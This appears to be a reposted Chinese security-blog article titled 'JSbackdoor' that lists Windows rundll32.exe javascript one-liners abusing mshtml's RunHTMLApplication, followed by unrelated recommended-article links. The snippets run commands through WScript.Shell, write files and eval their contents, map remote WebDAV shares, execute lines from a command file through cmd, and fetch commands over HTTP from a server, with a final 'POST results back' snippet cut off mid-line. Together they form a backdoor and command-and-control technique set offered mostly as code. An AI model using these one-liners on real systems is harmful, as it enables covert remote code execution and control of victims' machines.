JSbackdoor

2018 年 6 月 2 日 黑白之道


//Execute A Command

1


rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();

new%20ActiveXObject("WScript.Shell").Run("calc");

//Write To A File

1




rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

fso=new%20ActiveXObject("Scripting.FileSystemObject");

a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);

a.WriteLine("Test");a.Close();self.close;

//Read and Execute From A File

1




rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

document.write();fso=new%20ActiveXObject("Scripting.FileSystemO

bject");f=fso.OpenTextFile("c:\\Temp\\testfile.txt",1);eval

((f.ReadAll()));

//Map A Remote Share (WEBDAV)

1



rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive

("S:","https://live.sysinternals.com");self.close;

//Map A Local Share

1



rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive

("S:","\\\\Localhost\\c$");self.close;

//Read and Execute Commands From A File

1





rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

document.write();fso=new%20ActiveXObject("Scripting.FileSystemOb

ject");f=fso.OpenTextFile("c:\\Temp\\Commands.txt",1);while

(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");

t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);};

//Retrieve Commands From HTTP

1




rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");

h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();

B=h.ResponseText;alert(B);

//POST results back to Server

1


rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

document.write();h=new%2


文章出处:Evi1cg's blog   

原文链接:https://evi1cg.me/archives/121.html

你可能喜欢

记一次破解shift后门

针对某mysql批量提权工具的后门分析

windows下py转exe后门百分百绕过杀毒

登录查看更多
0

相关内容

【IJCAI2020】TransOMCS: 从语言图谱到常识图谱
专知会员服务
34+阅读 · 2020年5月4日
ExBert — 可视化分析Transformer学到的表示
专知会员服务
31+阅读 · 2019年10月16日
【新手福利】qPCR分析外泌体RNA如何选参照
外泌体之家
10+阅读 · 2019年11月8日
漏洞预警丨Xstream远程代码执行漏洞
FreeBuf
4+阅读 · 2019年7月25日
如何给你PyTorch里的Dataloader打鸡血
极市平台
15+阅读 · 2019年5月21日
Pipenv: 吹嘘自己无所不能,实际上没什么卵用
Python程序员
3+阅读 · 2018年12月21日
比Selenium快100倍的方法爬东方财富网财务报表
程序人生
8+阅读 · 2018年10月31日
浅谈浏览器 http 的缓存机制
前端大全
6+阅读 · 2018年1月21日
教你用Python爬虫股票评论,简单分析股民用户情绪
数据派THU
10+阅读 · 2017年12月12日
干货|全文检索Solr集成HanLP中文分词
全球人工智能
4+阅读 · 2017年8月27日
Learning to Focus when Ranking Answers
Arxiv
5+阅读 · 2018年8月8日
Arxiv
4+阅读 · 2018年5月4日
Arxiv
5+阅读 · 2015年9月14日
VIP会员
相关VIP内容
【IJCAI2020】TransOMCS: 从语言图谱到常识图谱
专知会员服务
34+阅读 · 2020年5月4日
ExBert — 可视化分析Transformer学到的表示
专知会员服务
31+阅读 · 2019年10月16日
相关资讯
【新手福利】qPCR分析外泌体RNA如何选参照
外泌体之家
10+阅读 · 2019年11月8日
漏洞预警丨Xstream远程代码执行漏洞
FreeBuf
4+阅读 · 2019年7月25日
如何给你PyTorch里的Dataloader打鸡血
极市平台
15+阅读 · 2019年5月21日
Pipenv: 吹嘘自己无所不能,实际上没什么卵用
Python程序员
3+阅读 · 2018年12月21日
比Selenium快100倍的方法爬东方财富网财务报表
程序人生
8+阅读 · 2018年10月31日
浅谈浏览器 http 的缓存机制
前端大全
6+阅读 · 2018年1月21日
教你用Python爬虫股票评论,简单分析股民用户情绪
数据派THU
10+阅读 · 2017年12月12日
干货|全文检索Solr集成HanLP中文分词
全球人工智能
4+阅读 · 2017年8月27日
Top
微信扫码咨询专知VIP会员